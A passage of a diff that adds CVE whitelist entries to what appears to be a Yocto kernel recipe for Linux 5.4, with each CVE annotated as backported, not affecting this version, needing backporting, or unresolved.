+CVE_CHECK_WHITELIST += "CVE-2022-21499"
+
+# cpe-stable-backport: Backported in 5.4.208
+CVE_CHECK_WHITELIST += "CVE-2022-21505"
+
+# cpe-stable-backport: Backported in 5.4.211
+CVE_CHECK_WHITELIST += "CVE-2022-2153"
+
+# fixed-version: only affects 5.8rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2022-2196"
+
+# CVE-2022-2209 has no known resolution
+
+# cpe-stable-backport: Backported in 5.4.175
+CVE_CHECK_WHITELIST += "CVE-2022-22942"
+
+# cpe-stable-backport: Backported in 5.4.184
+CVE_CHECK_WHITELIST += "CVE-2022-23036"
+
+# cpe-stable-backport: Backported in 5.4.184
+CVE_CHECK_WHITELIST += "CVE-2022-23037"
+
+# cpe-stable-backport: Backported in 5.4.184
+CVE_CHECK_WHITELIST += "CVE-2022-23038"
+
+# cpe-stable-backport: Backported in 5.4.184
+CVE_CHECK_WHITELIST += "CVE-2022-23039"
+
+# cpe-stable-backport: Backported in 5.4.184
+CVE_CHECK_WHITELIST += "CVE-2022-23040"
+
+# cpe-stable-backport: Backported in 5.4.184
+CVE_CHECK_WHITELIST += "CVE-2022-23041"
+
+# cpe-stable-backport: Backported in 5.4.184
+CVE_CHECK_WHITELIST += "CVE-2022-23042"
+
+# fixed-version: only affects 5.15rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2022-2308"
+
+# cpe-stable-backport: Backported in 5.4.204
+CVE_CHECK_WHITELIST += "CVE-2022-2318"
+
+# CVE-2022-23222 needs backporting (fixed from 5.17rc1)
+
+# CVE-2022-2327 needs backporting (fixed from 5.12rc1)
+
+# cpe-stable-backport: Backported in 5.4.189
+CVE_CHECK_WHITELIST += "CVE-2022-2380"
+
+# cpe-stable-backport: Backported in 5.4.217
+CVE_CHECK_WHITELIST += "CVE-2022-23816"
+
+# CVE-2022-23825 has no known resolution
+
+# cpe-stable-backport: Backported in 5.4.184
+CVE_CHECK_WHITELIST += "CVE-2022-23960"
+
+# fixed-version: only affects 5.14rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2022-24122"
+
+# cpe-stable-backport: Backported in 5.4.176
+CVE_CHECK_WHITELIST += "CVE-2022-24448"
+
+# cpe-stable-backport: Backported in 5.4.183
+CVE_CHECK_WHITELIST += "CVE-2022-24958"
+
+# cpe-stable-backport: Backported in 5.4.176
+CVE_CHECK_WHITELIST += "CVE-2022-24959"
+
+# cpe-stable-backport: Backported in 5.4.197
+CVE_CHECK_WHITELIST += "CVE-2022-2503"
+
+# cpe-stable-backport: Backported in 5.4.180
+CVE_CHECK_WHITELIST += "CVE-2022-25258"
+
+# CVE-2022-25265 has no known resolution
+
+# cpe-stable-backport: Backported in 5.4.180
+CVE_CHECK_WHITELIST += "CVE-2022-25375"
+
+# cpe-stable-backport: Backported in 5.4.182
+CVE_CHECK_WHITELIST += "CVE-2022-25636"
+
+# fixed-version: only affects 5.7rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2022-2585"
+
+# cpe-stable-backport: Backported in 5.4.211
+CVE_CHECK_WHITELIST += "CVE-2022-2586"
+
+# cpe-stable-backport: Backported in 5.4.211
+CVE_CHECK_WHITELIST += "CVE-2022-2588"
+
+# fixed-version: only affects 5.16rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2022-2590"
+
+# cpe-stable-backport: Backported in 5.4.220
+CVE_CHECK_WHITELIST += "CVE-2022-2602"
+
+# cpe-stable-backport: Backported in 5.4.204
+CVE_CHECK_WHITELIST += "CVE-2022-26365"
+
+# cpe-stable-backport: Backported in 5.4.210
+CVE_CHECK_WHITELIST += "CVE-2022-26373"
+
+# cpe-stable-backport: Backported in 5.4.191
+CVE_CHECK_WHITELIST += "CVE-2022-2639"
+
+# cpe-stable-backport: Backported in 5.4.188
+CVE_CHECK_WHITELIST += "CVE-2022-26490"
+
+# cpe-stable-backport: Backported in 5.4.213
+CVE_CHECK_WHITELIST += "CVE-2022-2663"
+
+# CVE-2022-26878 has no known resolution
+
+# cpe-stable-backport: Backported in 5.4.182
+CVE_CHECK_WHITELIST += "CVE-2022-26966"
+
+# cpe-stable-backport: Backported in 5.4.182
+CVE_CHECK_WHITELIST += "CVE-2022-27223"
+
+# cpe-stable-backport: Backported in 5.4.188
+CVE_CHECK_WHITELIST += "CVE-2022-27666"
+
+# CVE-2022-27672 needs backporting (fixed from 6.2)
+
+# fixed-version: only affects 5.18rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2022-2785"
+
+# fixed-version: only affects 5.15rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2022-27950"
+
+# cpe-stable-backport: Backported in 5.4.188
+CVE_CHECK_WHITELIST += "CVE-2022-28356"
+
+# cpe-stable-backport: Backported in 5.4.191
+CVE_CHECK_WHITELIST += "CVE-2022-28388"
+
+# cpe-stable-backport: Backported in 5.4.189
+CVE_CHECK_WHITELIST += "CVE-2022-28389"
+
+# cpe-stable-backport: Backported in 5.4.189
+CVE_CHECK_WHITELIST += "CVE-2022-28390"
+
+# fixed-version: only affects 5.11rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2022-2873"
+
+# fixed-version: only affects 5.17rc3 onwards
+CVE_CHECK_WHITELIST += "CVE-2022-28796"
+
+# cpe-stable-backport: Backported in 5.4.196
+CVE_CHECK_WHITELIST += "CVE-2022-28893"
+
+# fixed-version: only affects 5.5rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2022-2905"
+
+# fixed-version: only affects 5.12rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2022-29156"
+
+# cpe-stable-backport: Backported in 5.4.177
+CVE_CHECK_WHITELIST += "CVE-2022-2938"
+
+# cpe-stable-backport: Backported in 5.4.191
+CVE_CHECK_WHITELIST += "CVE-2022-29581"
+
+# fixed-version: only affects 5.5rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2022-29582"
+
+# fixed-version: only affects 5.8rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2022-2959"
+
+# CVE-2022-2961 has no known resolution
+
+# cpe-stable-backport: Backported in 5.4.180
+CVE_CHECK_WHITELIST += "CVE-2022-2964"
+
+# cpe-stable-backport: Backported in 5.4.189
+CVE_CHECK_WHITELIST += "CVE-2022-2977"
+
+# cpe-stable-backport: Backported in 5.4.218
+CVE_CHECK_WHITELIST += "CVE-2022-2978"
+
+# cpe-stable-backport: Backported in 5.4.217
+CVE_CHECK_WHITELIST += "CVE-2022-29900"
+
+# cpe-stable-backport: Backported in 5.4.217
+CVE_CHECK_WHITELIST += "CVE-2022-29901"
+
+# CVE-2022-2991 needs backporting (fixed from 5.15rc1)
+
+# fixed-version: only affects 5.16rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2022-29968"
+
+# cpe-stable-backport: Backported in 5.4.212
+CVE_CHECK_WHITELIST += "CVE-2022-3028"
+
+# cpe-stable-backport: Backported in 5.4.189
+CVE_CHECK_WHITELIST += "CVE-2022-30594"
+
+# CVE-2022-3061 needs backporting (fixed from 5.18rc5)
+
+# fixed-version: only affects 5.11rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2022-3077"
+
+# fixed-version: only affects 5.10rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2022-3078"
+
+# fixed-version: only affects 6.0rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2022-3103"
+
+# fixed-version: only affects 5.7rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2022-3104"
+
+# cpe-stable-backport: Backported in 5.4.171
+CVE_CHECK_WHITELIST += "CVE-2022-3105"
+
+# fixed-version: only affects 5.9rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2022-3106"
+
+# cpe-stable-backport: Backported in 5.4.187
+CVE_CHECK_WHITELIST += "CVE-2022-3107"
+
+# CVE-2022-3108 needs backporting (fixed from 5.17rc1)
+
+# fixed-version: only affects 5.15rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2022-3110"
+
+# cpe-stable-backport: Backported in 5.4.189
+CVE_CHECK_WHITELIST += "CVE-2022-3111"
+
+# fixed-version: only affects 5.7rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2022-3112"
+
+# fixed-version: only affects 5.10rc6 onwards
+CVE_CHECK_WHITELIST += "CVE-2022-3113"
+
+# fixed-version: only affects 5.13rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2022-3114"
+
+# cpe-stable-backport: Backported in 5.4.198
+CVE_CHECK_WHITELIST += "CVE-2022-3115"
+
+# cpe-stable-backport: Backported in 5.4.226
+CVE_CHECK_WHITELIST += "CVE-2022-3169"
+
+# fixed-version: only affects 6.0rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2022-3170"
+
+# CVE-2022-3176 needs backporting (fixed from 5.17rc1)
+
+# cpe-stable-backport: Backported in 5.4.189
+CVE_CHECK_WHITELIST += "CVE-2022-3202"
+
+# cpe-stable-backport: Backported in 5.4.198
+CVE_CHECK_WHITELIST += "CVE-2022-32250"
+
+# cpe-stable-backport: Backported in 5.4.201
+CVE_CHECK_WHITELIST += "CVE-2022-32296"
+
+# CVE-2022-3238 has no known resolution
+
+# cpe-stable-backport: Backported in 5.4.189
+CVE_CHECK_WHITELIST += "CVE-2022-3239"
+
+# cpe-stable-backport: Backported in 5.4.198
+CVE_CHECK_WHITELIST += "CVE-2022-32981"
+
+# cpe-stable-backport: Backported in 5.4.215
+CVE_CHECK_WHITELIST += "CVE-2022-3303"
+
+# CVE-2022-3344 needs backporting (fixed from 6.1rc7)
+
+# cpe-stable-backport: Backported in 5.4.204
+CVE_CHECK_WHITELIST += "CVE-2022-33740"
+
+# cpe-stable-backport: Backported in 5.4.204
+CVE_CHECK_WHITELIST += "CVE-2022-33741"
+
+# cpe-stable-backport: Backported in 5.4.204
+CVE_CHECK_WHITELIST += "CVE-2022-33742"
+
+# fixed-version: only affects 5.9rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2022-33743"
+
+# cpe-stable-backport: Backported in 5.4.204
+CVE_CHECK_WHITELIST += "CVE-2022-33744"
+
+# cpe-stable-backport: Backported in 5.4.192
+CVE_CHECK_WHITELIST += "CVE-2022-33981"
+
+# cpe-stable-backport: Backported in 5.4.229
+CVE_CHECK_WHITELIST += "CVE-2022-3424"
+
+# fixed-version: only affects 5.18rc2 onwards
+CVE_CHECK_WHITELIST += "CVE-2022-3435"
+
+# fixed-version: only affects 5.13rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2022-34494"
+
+# fixed-version: only affects 5.13rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2022-34495"
+
+# cpe-stable-backport: Backported in 5.4.244
+CVE_CHECK_WHITELIST += "CVE-2022-34918"
+
+# cpe-stable-backport: Backported in 5.4.225
+CVE_CHECK_WHITELIST += "CVE-2022-3521"
+
+# CVE-2022-3522 needs backporting (fixed from 6.1rc1)
+
+# CVE-2022-3523 needs backporting (fixed from 6.1rc1)
+
+# cpe-stable-backport: Backported in 5.4.224
+CVE_CHECK_WHITELIST += "CVE-2022-3524"
+
+# fixed-version: only affects 5.13rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2022-3526"
+
+# fixed-version: only affects 5.19rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2022-3531"
+
+# fixed-version: only affects 6.1rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2022-3532"
+
+# CVE-2022-3533 has no known resolution
+
+# CVE-2022-3534 needs backporting (fixed from 6.2rc1)
+
+# cpe-stable-backport: Backported in 5.4.220
+CVE_CHECK_WHITELIST += "CVE-2022-3535"
+
+# fixed-version: only affects 5.19rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2022-3541"
+
+# cpe-stable-backport: Backported in 5.4.220
+CVE_CHECK_WHITELIST += "CVE-2022-3542"
+
+# fixed-version: only affects 5.15rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2022-3543"
+
+# CVE-2022-3544 has no known resolution
+
+# cpe-stable-backport: Backported in 5.4.228
+CVE_CHECK_WHITELIST += "CVE-2022-3545"
+
+# cpe-stable-backport: Backported in 5.4.224
+CVE_CHECK_WHITELIST += "CVE-2022-3564"
+
+# cpe-stable-backport: Backported in 5.4.220
+CVE_CHECK_WHITELIST += "CVE-2022-3565"
+
+# CVE-2022-3566 needs backporting (fixed from 6.1rc1)
+
+# CVE-2022-3567 needs backporting (fixed from 6.1rc1)
+
+# cpe-stable-backport: Backported in 5.4.198
+CVE_CHECK_WHITELIST += "CVE-2022-3577"
+
+# cpe-stable-backport: Backported in 5.4.213
+CVE_CHECK_WHITELIST += "CVE-2022-3586"
+
+# cpe-stable-backport: Backported in 5.4.220
+CVE_CHECK_WHITELIST += "CVE-2022-3594"
+
+# CVE-2022-3595 needs backporting (fixed from 6.1rc1)
+
+# CVE-2022-3606 has no known resolution
+
+# cpe-stable-backport: Backported in 5.4.207
+CVE_CHECK_WHITELIST += "CVE-2022-36123"
+
+# fixed-version: only affects 5.12rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2022-3619"
+
+# cpe-stable-backport: Backported in 5.4.218
+CVE_CHECK_WHITELIST += "CVE-2022-3621"
+
+# cpe-stable-backport: Backported in 5.4.228
+CVE_CHECK_WHITELIST += "CVE-2022-3623"
+
+# CVE-2022-3624 needs backporting (fixed from 6.0rc1)
+
+# cpe-stable-backport: Backported in 5.4.211
+CVE_CHECK_WHITELIST += "CVE-2022-3625"
+
+# cpe-stable-backport: Backported in 5.4.224
+CVE_CHECK_WHITELIST += "CVE-2022-3628"
+
+# cpe-stable-backport: Backported in 5.4.229
+CVE_CHECK_WHITELIST += "CVE-2022-36280"
+
+# cpe-stable-backport: Backported in 5.4.211
+CVE_CHECK_WHITELIST += "CVE-2022-3629"
+
+# fixed-version: only affects 5.19rc6 onwards
+CVE_CHECK_WHITELIST += "CVE-2022-3630"
+
+# cpe-stable-backport: Backported in 5.4.211
+CVE_CHECK_WHITELIST += "CVE-2022-3633"
+
+# cpe-stable-backport: Backported in 5.4.211
+CVE_CHECK_WHITELIST += "CVE-2022-3635"
+
+# CVE-2022-3636 needs backporting (fixed from 5.19rc1)
+
+# fixed-version: only affects 5.19 onwards
+CVE_CHECK_WHITELIST += "CVE-2022-3640"
+
+# CVE-2022-36402 needs backporting (fixed from 6.5)
+
+# CVE-2022-3642 has no known resolution
+
+# cpe-stable-backport: Backported in 5.4.227
+CVE_CHECK_WHITELIST += "CVE-2022-3643"
+
+# cpe-stable-backport: Backported in 5.4.218
+CVE_CHECK_WHITELIST += "CVE-2022-3646"
+
+# cpe-stable-backport: Backported in 5.4.220
+CVE_CHECK_WHITELIST += "CVE-2022-3649"
+
+# cpe-stable-backport: Backported in 5.4.208
+CVE_CHECK_WHITELIST += "CVE-2022-36879"
+
+# cpe-stable-backport: Backported in 5.4.209
+CVE_CHECK_WHITELIST += "CVE-2022-36946"
+
+# cpe-stable-backport: Backported in 5.4.233
+CVE_CHECK_WHITELIST += "CVE-2022-3707"
+
+# CVE-2022-38096 has no known resolution
+
+# CVE-2022-38457 needs backporting (fixed from 6.2rc4)
+
+# CVE-2022-3903 needs backporting (fixed from 6.1rc2)
+
+# fixed-version: only affects 5.18 onwards
+CVE_CHECK_WHITELIST += "CVE-2022-3910"
+
+# CVE-2022-39188 needs backporting (fixed from 5.19rc8)
+
+# cpe-stable-backport: Backported in 5.4.244
+CVE_CHECK_WHITELIST += "CVE-2022-39189"
+
+# fixed-version: only affects 5.9rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2022-39190"
+
+# fixed-version: only affects 5.18rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2022-3977"
+
+# cpe-stable-backport: Backported in 5.4.215
+CVE_CHECK_WHITELIST += "CVE-2022-39842"
+
+# CVE-2022-40133 needs backporting (fixed from 6.2rc4)
+
+# cpe-stable-backport: Backported in 5.4.213
+CVE_CHECK_WHITELIST += "CVE-2022-40307"
+
+# fixed-version: only affects 5.19rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2022-40476"
+
+# cpe-stable-backport: Backported in 5.4.218
+CVE_CHECK_WHITELIST += "CVE-2022-40768"
+
+# cpe-stable-backport: Backported in 5.4.213
+CVE_CHECK_WHITELIST += "CVE-2022-4095"
+
+# cpe-stable-backport: Backported in 5.4.252
+CVE_CHECK_WHITELIST += "CVE-2022-40982"
+
+# cpe-stable-backport: Backported in 5.4.229
+CVE_CHECK_WHITELIST += "CVE-2022-41218"
+
+# cpe-stable-backport: Backported in 5.4.211
+CVE_CHECK_WHITELIST += "CVE-2022-41222"
+
+# fixed-version: only affects 5.19rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2022-4127"
+
+# fixed-version: only affects 5.17rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2022-4128"
+
+# cpe-stable-backport: Backported in 5.4.231
+CVE_CHECK_WHITELIST += "CVE-2022-4129"
+
+# fixed-version: only affects 5.17rc2 onwards
+CVE_CHECK_WHITELIST += "CVE-2022-4139"
+
+# cpe-stable-backport: Backported in 5.4.218
+CVE_CHECK_WHITELIST += "CVE-2022-41674"
+
+# CVE-2022-41848 has no known resolution
+
+# cpe-stable-backport: Backported in 5.4.220
+CVE_CHECK_WHITELIST += "CVE-2022-41849"
+
+# cpe-stable-backport: Backported in 5.4.220
+CVE_CHECK_WHITELIST += "CVE-2022-41850"
+
+# cpe-stable-backport: Backported in 5.4.190
+CVE_CHECK_WHITELIST += "CVE-2022-41858"
+
+# fixed-version: only affects 5.16rc7 onwards
+CVE_CHECK_WHITELIST += "CVE-2022-42328"
+
+# fixed-version: only affects 5.16rc7 onwards
+CVE_CHECK_WHITELIST += "CVE-2022-42329"
+
+# cpe-stable-backport: Backported in 5.4.215
+CVE_CHECK_WHITELIST += "CVE-2022-42432"
+
+# CVE-2022-4269 needs backporting (fixed from 6.3rc1)
+
+# cpe-stable-backport: Backported in 5.4.212
+CVE_CHECK_WHITELIST += "CVE-2022-42703"
+
+# cpe-stable-backport: Backported in 5.4.219
+CVE_CHECK_WHITELIST += "CVE-2022-42719"
+
+# cpe-stable-backport: Backported in 5.4.218
+CVE_CHECK_WHITELIST += "CVE-2022-42720"
+
+# cpe-stable-backport: Backported in 5.4.218
+CVE_CHECK_WHITELIST += "CVE-2022-42721"
+
+# fixed-version: only affects 5.8rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2022-42722"
+
+# cpe-stable-backport: Backported in 5.4.224
+CVE_CHECK_WHITELIST += "CVE-2022-42895"
+
+# cpe-stable-backport: Backported in 5.4.226
+CVE_CHECK_WHITELIST += "CVE-2022-42896"
+
+# cpe-stable-backport: Backported in 5.4.218
+CVE_CHECK_WHITELIST += "CVE-2022-43750"
+
+# fixed-version: only affects 5.8rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2022-4378"
+
+# fixed-version: only affects 5.6rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2022-4379"
+
+# cpe-stable-backport: Backported in 5.4.230
+CVE_CHECK_WHITELIST += "CVE-2022-4382"
+
+# fixed-version: only affects 5.11rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2022-43945"
+
+# CVE-2022-44032 needs backporting (fixed from 6.4rc1)
+
+# CVE-2022-44033 needs backporting (fixed from 6.4rc1)
+
+# CVE-2022-44034 needs backporting (fixed from 6.4rc1)
+
+# CVE-2022-4543 has no known resolution
+
+# fixed-version: only affects 5.12rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2022-45869"
+
+# CVE-2022-45884 has no known resolution
+
+# CVE-2022-45885 has no known resolution
+
+# cpe-stable-backport: Backported in 5.4.246
+CVE_CHECK_WHITELIST += "CVE-2022-45886"
+
+# cpe-stable-backport: Backported in 5.4.246
+CVE_CHECK_WHITELIST += "CVE-2022-45887"
+
+# fixed-version: only affects 5.14rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2022-45888"
+
+# cpe-stable-backport: Backported in 5.4.246
+CVE_CHECK_WHITELIST += "CVE-2022-45919"
+
+# cpe-stable-backport: Backported in 5.4.229
+CVE_CHECK_WHITELIST += "CVE-2022-45934"
+
+# cpe-stable-backport: Backported in 5.4.213
+CVE_CHECK_WHITELIST += "CVE-2022-4662"
+
+# fixed-version: only affects 5.10rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2022-4696"
+
+# cpe-stable-backport: Backported in 5.4.240
+CVE_CHECK_WHITELIST += "CVE-2022-4744"
+
+# fixed-version: only affects 5.7rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2022-47518"
+
+# fixed-version: only affects 5.7rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2022-47519"
+
+# CVE-2022-47520 needs backporting (fixed from 6.1rc8)
+
+# fixed-version: only affects 5.7rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2022-47521"
+
+# cpe-stable-backport: Backported in 5.4.229
+CVE_CHECK_WHITELIST += "CVE-2022-47929"
+
+# fixed-version: only affects 5.15rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2022-47938"
+
+# fixed-version: only affects 5.15rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2022-47939"
+
+# fixed-version: only affects 5.15rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2022-47940"
+
+# fixed-version: only affects 5.15rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2022-47941"
+
+# fixed-version: only affects 5.15rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2022-47942"
+
+# fixed-version: only affects 5.15rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2022-47943"
+
+# CVE-2022-47946 needs backporting (fixed from 5.12rc2)
+
+# fixed-version: only affects 5.15rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2022-4842"
+
+# fixed-version: only affects 5.15rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2022-48423"
+
+# fixed-version: only affects 5.15rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2022-48424"
+
+# fixed-version: only affects 5.15rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2022-48425"
+
+# fixed-version: only affects 5.15rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2022-48502"
+
+# cpe-stable-backport: Backported in 5.4.196
+CVE_CHECK_WHITELIST += "CVE-2022-48619"
+
+# cpe-stable-backport: Backported in 5.4.179
+CVE_CHECK_WHITELIST += "CVE-2022-48626"
+
+# CVE-2022-48627 needs backporting (fixed from 5.19rc7)
+
+# CVE-2022-48628 needs backporting (fixed from 6.6rc1)
+
+# cpe-stable-backport: Backported in 5.4.187
+CVE_CHECK_WHITELIST += "CVE-2022-48629"
+
+# fixed-version: only affects 5.17 onwards
+CVE_CHECK_WHITELIST += "CVE-2022-48630"
+
+# fixed-version: Fixed after version 5.0rc1
+CVE_CHECK_WHITELIST += "CVE-2023-0030"
+
+# cpe-stable-backport: Backported in 5.4.229
+CVE_CHECK_WHITELIST += "CVE-2023-0045"
+
+# cpe-stable-backport: Backported in 5.4.160
+CVE_CHECK_WHITELIST += "CVE-2023-0047"
+
+# fixed-version: only affects 6.0rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2023-0122"
+
+# cpe-stable-backport: Backported in 5.4.243
+CVE_CHECK_WHITELIST += "CVE-2023-0160"
+
+# fixed-version: only affects 5.5rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2023-0179"
+
+# fixed-version: only affects 5.15rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2023-0210"
+
+# CVE-2023-0240 needs backporting (fixed from 5.10rc1)
+
+# cpe-stable-backport: Backported in 5.4.229
+CVE_CHECK_WHITELIST += "CVE-2023-0266"
+
+# CVE-2023-0386 needs backporting (fixed from 6.2rc6)
+
+# cpe-stable-backport: Backported in 5.4.229
+CVE_CHECK_WHITELIST += "CVE-2023-0394"
+
+# cpe-stable-backport: Backported in 5.4.230
+CVE_CHECK_WHITELIST += "CVE-2023-0458"
+
+# cpe-stable-backport: Backported in 5.4.233
+CVE_CHECK_WHITELIST += "CVE-2023-0459"
+
+# cpe-stable-backport: Backported in 5.4.229
+CVE_CHECK_WHITELIST += "CVE-2023-0461"
+
+# fixed-version: only affects 5.17rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2023-0468"
+
+# fixed-version: only affects 5.19rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2023-0469"
+
+# cpe-stable-backport: Backported in 5.4.240
+CVE_CHECK_WHITELIST += "CVE-2023-0590"
+
+# CVE-2023-0597 needs backporting (fixed from 6.2rc1)
+
+# cpe-stable-backport: Backported in 5.4.223
+CVE_CHECK_WHITELIST += "CVE-2023-0615"
+
+# fixed-version: only affects 5.19rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2023-1032"
+
+# cpe-stable-backport: Backported in 5.4.231
+CVE_CHECK_WHITELIST += "CVE-2023-1073"
+
+# cpe-stable-backport: Backported in 5.4.231
+CVE_CHECK_WHITELIST += "CVE-2023-1074"
+
+# CVE-2023-1075 needs backporting (fixed from 6.2rc7)
+
+# cpe-stable-backport: Backported in 5.4.235
+CVE_CHECK_WHITELIST += "CVE-2023-1076"
+
+# cpe-stable-backport: Backported in 5.4.235
+CVE_CHECK_WHITELIST += "CVE-2023-1077"
+
+# cpe-stable-backport: Backported in 5.4.232
+CVE_CHECK_WHITELIST += "CVE-2023-1078"
+
+# cpe-stable-backport: Backported in 5.4.235
+CVE_CHECK_WHITELIST += "CVE-2023-1079"
+
+# cpe-stable-backport: Backported in 5.4.211
+CVE_CHECK_WHITELIST += "CVE-2023-1095"
+
+# cpe-stable-backport: Backported in 5.4.235
+CVE_CHECK_WHITELIST += "CVE-2023-1118"
+
+# fixed-version: only affects 5.15rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2023-1192"
+
+# fixed-version: only affects 5.15rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2023-1193"
+
+# fixed-version: only affects 5.15rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2023-1194"
+
+# fixed-version: only affects 5.16rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2023-1195"
+
+# cpe-stable-backport: Backported in 5.4.253
+CVE_CHECK_WHITELIST += "CVE-2023-1206"
+
+# CVE-2023-1249 needs backporting (fixed from 5.18rc1)
+
+# fixed-version: only affects 5.6rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2023-1252"
+
+# CVE-2023-1281 needs backporting (fixed from 6.2)
+
+# fixed-version: only affects 5.6rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2023-1295"
+
+# cpe-stable-backport: Backported in 5.4.243
+CVE_CHECK_WHITELIST += "CVE-2023-1380"
+
+# cpe-stable-backport: Backported in 5.4.226
+CVE_CHECK_WHITELIST += "CVE-2023-1382"
+
+# cpe-stable-backport: Backported in 5.4.92
+CVE_CHECK_WHITELIST += "CVE-2023-1390"
+
+# CVE-2023-1476 has no known resolution
+
+# cpe-stable-backport: Backported in 5.4.232
+CVE_CHECK_WHITELIST += "CVE-2023-1513"
+
+# CVE-2023-1582 needs backporting (fixed from 5.17rc4)
+
+# fixed-version: only affects 5.19rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2023-1583"
+
+# cpe-stable-backport: Backported in 5.4.253
+CVE_CHECK_WHITELIST += "CVE-2023-1611"
+
+# cpe-stable-backport: Backported in 5.4.189
+CVE_CHECK_WHITELIST += "CVE-2023-1637"
+
+# fixed-version: only affects 5.14rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2023-1652"
+
+# cpe-stable-backport: Backported in 5.4.240
+CVE_CHECK_WHITELIST += "CVE-2023-1670"
+
+# cpe-stable-backport: Backported in 5.4.235
+CVE_CHECK_WHITELIST += "CVE-2023-1829"
+
+# cpe-stable-backport: Backported in 5.4.196
+CVE_CHECK_WHITELIST += "CVE-2023-1838"
+
+# cpe-stable-backport: Backported in 5.4.238
+CVE_CHECK_WHITELIST += "CVE-2023-1855"
+
+# cpe-stable-backport: Backported in 5.4.241
+CVE_CHECK_WHITELIST += "CVE-2023-1859"
+
+# fixed-version: only affects 5.7rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2023-1872"
+
+# cpe-stable-backport: Backported in 5.4.240
+CVE_CHECK_WHITELIST += "CVE-2023-1989"
+
+# cpe-stable-backport: Backported in 5.4.238
+CVE_CHECK_WHITELIST += "CVE-2023-1990"
+
+# fixed-version: only affects 5.19rc7 onwards
+CVE_CHECK_WHITELIST += "CVE-2023-1998"
+
+# cpe-stable-backport: Backported in 5.4.243
+CVE_CHECK_WHITELIST += "CVE-2023-2002"
+
+# fixed-version: only affects 5.10rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2023-2006"
+
+# CVE-2023-2007 needs backporting (fixed from 6.0rc1)
+
+# cpe-stable-backport: Backported in 5.4.202
+CVE_CHECK_WHITELIST += "CVE-2023-2008"
+
+# fixed-version: only affects 5.12rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2023-2019"
+
+# cpe-stable-backport: Backported in 5.4.252
+CVE_CHECK_WHITELIST += "CVE-2023-20569"
+
+# CVE-2023-20588 needs backporting (fixed from 6.5rc6)
+
+# cpe-stable-backport: Backported in 5.4.250
+CVE_CHECK_WHITELIST += "CVE-2023-20593"
+
+# CVE-2023-20928 needs backporting (fixed from 6.0rc1)
+
+# CVE-2023-20937 has no known resolution
+
+# fixed-version: only affects 5.17rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2023-20938"
+
+# CVE-2023-20941 has no known resolution
+
+# fixed-version: only affects 5.14rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2023-21102"
+
+# fixed-version: only affects 5.19rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2023-21106"
+
+# cpe-stable-backport: Backported in 5.4.249
